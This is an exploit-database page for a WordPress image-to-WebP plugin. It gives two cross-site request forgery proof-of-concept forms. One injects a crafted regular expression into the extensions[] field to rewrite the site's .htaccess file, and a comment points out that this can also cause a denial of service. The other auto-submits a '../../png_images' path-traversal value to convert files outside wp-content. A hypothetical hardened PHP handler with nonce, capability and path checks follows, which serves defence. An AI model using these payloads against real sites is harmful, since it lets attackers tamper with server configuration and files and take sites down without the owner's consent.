## https://sploitus.com/exploit?id=WPEX-ID:972F8C5D-22B7-42DE-A981-2E5ACB72297B
The PoC varies based on the endpoint targeted. Here is one example that modifies the website's .htaccess file when the form is submitted by a logged-in user.

<form action="https://example.com/wp-admin/upload.php?page=images-to-webp.php&tab=general" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="plugin_sent" value="1">
<input type="hidden" name="webp_quality" value="50">
<input type="hidden" name="upload_convert" value="1">
<input type="hidden" name="method" value="gd">
<input type="hidden" name="extensions[]" value="jpg">
<!-- Inject regular expression. You can also add invalid regex to make malformed .htaccess file and DoS. -->
<input type="hidden" name="extensions[]" value="INJECT_VALUE_HERE)|(.*">
<input type=submit>
</form>

This one converts files in C:\xampp\htdocs\png_images when WordPress is installed in C:\xampp\htdocs\wordpress\; the folder path is relative to wp-content.
<form action="https://example.com/wp-admin/admin-ajax.php" method="post" enctype="application/x-www-form-urlencoded" id="form">
<input type="hidden" name="action" value="convert_old_images">
<input type="hidden" name="only_missing" value="0">
<input type="hidden" name="folder" value="../../png_images">
</form>
<script>form.submit()</script>
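
Both forms succeed only if the receiving handlers accept a state-changing POST from a logged-in user without a per-user token and use `extensions[]` and `folder` as submitted. The following is an added example of the server-side checks that close this, not the plugin's own code; it assumes that behaviour, and the `itw_*` function names, nonce actions, option key and extension allowlist are hypothetical.

```php
<?php
// Added example: hypothetical hardened handlers, not the plugin's own code.
// Assumed names: itw_* functions, nonce actions, option key, extension allowlist.

function itw_clean_extensions($raw) {
    // Allowlist only: a value such as "INJECT_VALUE_HERE)|(.*" never reaches .htaccess.
    $allowed = array('jpg', 'jpeg', 'png', 'gif');
    $given   = array_map('strtolower', array_filter((array) $raw, 'is_string'));
    return array_values(array_intersect($allowed, $given));
}

function itw_resolve_folder($relative) {
    // Resolve symlinks and "..", then require the result to stay under wp-content.
    $base   = realpath(WP_CONTENT_DIR);
    $target = realpath($base . DIRECTORY_SEPARATOR . $relative);
    $inside = $target !== false
        && strpos($target . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) === 0;
    return $inside ? $target : false;
}

add_action('admin_init', 'itw_save_settings');
function itw_save_settings() {
    if (empty($_POST['plugin_sent'])) {
        return;
    }
    check_admin_referer('itw_settings');            // dies unless _wpnonce is valid
    if (!current_user_can('manage_options')) {
        wp_die('Forbidden', '', array('response' => 403));
    }
    $raw = isset($_POST['extensions']) ? wp_unslash($_POST['extensions']) : array();
    update_option('itw_extensions', itw_clean_extensions($raw));
}

add_action('wp_ajax_convert_old_images', 'itw_convert_old_images');
function itw_convert_old_images() {
    check_ajax_referer('itw_convert', '_wpnonce');  // dies with 403 on a bad nonce
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    $raw    = isset($_POST['folder']) ? wp_unslash($_POST['folder']) : '';
    $folder = is_string($raw) ? itw_resolve_folder($raw) : false;
    if ($folder === false) {
        wp_send_json_error('folder must be inside wp-content', 400);
    }
    // Conversion would start from the validated path returned here.
    wp_send_json_success(array('folder' => $folder));
}
```

The settings form and the AJAX caller have to emit the matching tokens with `wp_nonce_field('itw_settings')` and `wp_create_nonce('itw_convert')`. With these checks, the `../../png_images` value from the second form resolves outside wp-content and is rejected.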